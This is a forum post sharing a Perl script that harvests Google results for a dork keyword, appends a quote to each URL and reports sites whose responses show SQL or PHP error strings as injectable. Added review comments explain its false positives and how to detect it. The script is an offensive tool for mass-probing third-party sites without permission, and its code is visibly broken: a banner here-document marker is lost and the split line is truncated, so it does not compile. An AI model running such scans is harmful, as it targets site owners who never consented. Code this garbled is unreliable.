
Perl [Perl] SQLi Vulnerable Scanner (Linux)


sQuo

Code:
>#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner        .:.
# .:. Version : 4.0 fixed (01/12/2012)        .:.
# .:. Author : Metropolis                     .:.
# .:. Home : https://www.metropolis.fr.cr/    .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection                         .:.
# .:. MSAccess Injection                      .:.
# .:. MSSQL Injection                         .:.
# .:. Oracle Injection                        .:.
# .:. Blind Injection                         .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Feel free to do whatever you want with this code!
# Enjoy!
# Sql Injection Dork List :
# http://pastebin.com/eHG8eC7z
use LWP::UserAgent;
use Getopt::Std;
# Clear the terminal by shelling out to `clear` (fixed string; no user input
# reaches the shell).
system("clear");
# Getopt::Std::getopt: -k, -p and -o each take a value, stored in the global
# %opts. -o is accepted here but is not read anywhere in the code shown.
getopt('kpo', \%opts);
# No -k value: print the usage line. Execution is not stopped here, so the
# rest of the script still runs with an empty search keyword.
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
# -p is the number of search-result pages the main loop walks; it defaults to
# a single page when the switch is absent.
if($opts{'p'} eq '')
{
   $opts{'p'} = 1;
}

# Startup banner.
# NOTE(review): as listed, this statement does not parse. A bare `print` is
# followed by raw ASCII art and a lone `Metropolis_intro` line, which looks
# like a here-document whose opening marker was lost when the page was
# extracted. The text is left exactly as found.
print  

   ___________
  |.---------.|
  ||         ||
  || scanner ||   
  ||         ||   
  |'---------'|   
   `)__ ____('     
   [=== -- o ]--.
 __'---------'__ \     
[::::::::::: :::] )
`""'"""""'""""`/T\
               \_/

Metropolis_intro
# NOTE(review): `COLOR A` looks like the Windows cmd.exe colour builtin, while
# the script earlier shells out to `clear`; on a Linux host this call
# presumably just fails. Its return value is not checked.
system('COLOR A');
# Name of the tool, the database families whose error strings it looks for,
# and the author credit.
print "\n\n[script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";
# Main loop: one iteration per search-result page (start=0,10,20,... for -p
# pages). Each page is fetched, lines containing ` class=l` are picked out of
# the HTML, and whatever precedes that marker is requested once with a single
# quote appended. The response body is then compared against a fixed list of
# database and PHP error strings.
#
# Defender's view: this is error-string matching and nothing more. None of the
# branches below can fire against an application that uses parameterized
# queries and does not echo database or PHP errors back to the client.
for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
   # Search URL: the -k value is concatenated in as-is, with the page offset.
   $t = "http://www.google.com/search?hl=com&q=".$opts{'k'}."&btnG=Search&start=".$start;
   # Search request: 10 s timeout, proxy settings taken from the environment
   # (env_proxy), and a fixed Firefox 11 User-Agent string.
   $ua = LWP::UserAgent->new;
   $ua->timeout(10);
   $ua->env_proxy;
   $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0");
   $response = $ua->get($t);
   if ($response->is_success)
   {
       $c = $response->content;
       # NOTE(review): the next line is truncated in this listing. The split
       # pattern, its closing delimiter and the statement terminator are
       # missing, and the `foreach` header has been fused onto it. The script
       # does not compile as shown; the line is left byte-for-byte.
       @stuff = split(/        foreach $line(@stuff)
       {
           # Captures everything before ` class=l` on the line into $1 --
           # presumably the link part of a result entry in the search page
           # markup of the time; TODO confirm.
           if($line =~/(.*) class=l/ig)
           {
               $out = $1;
               # Strip double quotes, then append a single quote to the end
               # of the string (s/$/\'/).
               $out =~ s/"//g;
     $out =~s/$/\'/;
   # A second, fresh UserAgent is built for the probe and agent() is never
   # called on it, so this request goes out with LWP's default libwww-perl
   # User-Agent. A request whose URL ends in a quote character, sent with that
   # User-Agent, is a simple pattern to alert on in web-server or WAF logs.
   $ua = LWP::UserAgent->new;
   $ua->timeout(10);
   $ua->env_proxy;
   $response = $ua->get($out);
           # is_success is not checked for this response: the body is examined
           # whatever the status code was.
           $error = $response->content();
            
           # Signature matching: the first branch that matches prints the URL
           # with a label and the rest are skipped.
           # NOTE(review): inside these patterns `()` is an empty capture
           # group, not literal parentheses, so e.g. /mysql_fetch_array()/
           # matches the bare function name anywhere in the body.
           # Many branches match generic PHP warnings (session_start,
           # getimagesize, is_writable, array_merge, preg_match, filesize,
           # require) that are unrelated to SQL, yet print "Vulnerable MySQL!".
           # The output is an unverified hint, not a finding. On the server
           # side, turning off client-visible error output removes every
           # string this chain keys on.
           if($error =~m/SQL syntax/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
               {print "$out Vulnerable MS Access!\n";}
                
           elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
               {print "$out Vulnerable MSSQL!\n";}
            
           # Labelled "Blind Possible", but the test is still the presence of
           # a PHP function name in the body; no blind technique is applied.
           elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
               {print "$out Vulnerable Blind Possible!\n";}
                
           elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
               {print "$out Vulnerable Oracle!\n";}
                
           elsif($error =~m/Warning: mysql_fetch_assoc()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: session_start()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: getimagesize()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: is_writable()/)
               {print "$out Vulnerable MySQL!\n";}
                
           # Unreachable: same pattern as the getimagesize branch above.
           elsif($error =~m/Warning: getimagesize()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: Unknown()/)
               {print "$out Vulnerable MySQL!\n";}
                
           # Unreachable: same pattern as the session_start branch above.
           elsif($error =~m/Warning: session_start()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: mysql_result()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: mysql_query()/)
               {print "$out Vulnerable MySQL!\n";}
                
           # Unreachable: the earlier /mysql_num_rows()/ test already matches
           # any body this pattern would match.
           elsif($error =~m/Warning: mysql_num_rows()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: array_merge()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: preg_match()/)
               {print "$out Vulnerable MySQL!\n";}
                
           # `ilesize` is presumably a typo for `filesize` (next branch); as
           # written it is unlikely to match real PHP output.
           elsif($error =~m/Warning: ilesize()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: filesize()/)
               {print "$out Vulnerable MySQL!\n";}
                
           elsif($error =~m/Warning: require()/)
               {print "$out Vulnerable MySQL!\n";}
    
                
          

                
           }


       }
       }
       }